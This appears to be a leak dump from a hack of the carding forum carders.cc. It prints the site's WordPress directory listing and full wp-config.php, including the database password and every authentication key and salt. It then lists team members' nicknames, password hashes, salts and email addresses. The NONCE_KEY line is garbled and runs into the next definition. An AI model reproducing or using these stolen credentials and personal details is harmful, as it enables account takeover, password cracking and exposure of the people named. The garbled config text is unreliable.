-r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-rss2.php
-r-xr-x--- 1 cardersblog www 9177 Aug 27 17:23 wp-settings.php
-r-xr-x--- 1 cardersblog www 18695 Aug 27 17:23 wp-signup.php
-r-xr-x--- 1 cardersblog www 3702 Aug 27 17:23 wp-trackback.php
-r-xr-x--- 1 cardersblog www 94184 Aug 27 17:23 xmlrpc.php

|$ cat wp-config.php
||/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information
* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'carderscc_02');

/** MySQL database username */
define('DB_USER', 'carderscc_02');

/** MySQL database password */
define('DB_PASSWORD', 'UGZf7e6gzugef76t&/gudz376/&|$%e3zugdwzgdwdztFzettf6532df');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'Mcpgq1/{n^mP,4naDg;4Y/gdX+J~.(DBLI|y~FJy*+@BDtD=CJr^M|$idR[*P vuR');
define('SECURE_AUTH_KEY', '-=q0|$7`R?iH}MkK^KHxbxa4)-]OcrG3y2^EVT^fs%6&7-!<__AcgC^_T+|$|$sM');
define('LOGGED_IN_KEY', 'Sb{c7+Nhb%ao-#ylff|(I{m,fqK5}>/?7m8/r0!,o}+e:eQfZo;7W:h7av[E:0V[');
define('NONCE_KEY', '|R(!,}`utsK5kdefine('AUTH_SALT', '|zI ^JtuY-|uB;}I~X~Sn.W[BZ_pX gWA*nFL`SR]b+ bB,LVj7u+Rov|F=*@ DP');
define('SECURE_AUTH_SALT', 'N^]btUNZY-k+|%HkM##`iB2b{pftxG~:WDLwp}a!M+d8Gy.*M?p(]-SQPfZq]+k)');
define('LOGGED_IN_SALT', 'JASsyk1%PQ|!exxL,JB|0or-~zWcx+lv+KpnMH<&+Ro=USk--Z:8 #8a!+NkL|$');
define('NONCE_SALT', 'yN8`y~ji|$4+1)&N3j+KcY*x~n7=vS)Ip;! [>Q0|$LoSd=e?X+C]bqBEp5WWbWLSb');

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
|$table_prefix = 'wp_';

/**
* WordPress Localized Language, defaults to English.
*
* Change this to localize WordPress. A corresponding MO file for the chosen
* language must be installed to wp-content/languages. For example, install
* de.mo to wp-content/languages and set WPLANG to 'de' to enable German
* language support.
*/
define ('WPLANG', '');

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

##

put shit
to shit
carders.cc

Team Member Passes:

Vitali:28cf8ccb53f80f7e8fca5e781f2e6424:dusFzU/ZvUe;e@fx\\3>XIgN[yGx9[*:admin@carders.cc
Juri:9475264713e83164de106d099350ff97:pqfgN4x7P)5_}0-E+PsIJ\\=_o1|oV&:daafagafd@dadadagfasg.dsxc
Luigi:13ae8bfbd4fc44302fc6261f58dd583e:.u5//.-K4
acheron:60536586e174bce7aa1fccf6a674f6f6:"Ru97*G!'*1'{vhs}3Ze4jCnQ8CT=p:
cyberhood:c5ad50f86c6dbbbea072c243b6466a1f:XY4NYQYr:soh.cyberhood@googlemail.com
e0s:86ca341341366d95e5eb02c79d1cfd47:Q\\8NL6Zno+G-}J'n(T?ndQbV{vhcN=:e0s@z1p.biz
M0RPHEUS:fa667b7f92f7cc9f7739bbbbe68f9a9c:E\\T|$#=?"hy"g0BD~@giHAtDDj`P0VS:m0rpheus@carders.cc
Mr.Rus:6e3c81779f105c2cb8a5f36261000cc5:x6GX91GTd|$D^yn/@U>`u|$lm00M3V}h:d397080@lhsdv.com
Poseidon:0c18d81bcfa2845490f75e785f0e2457:BG|$vA-%K_X


Part 2 : Click Here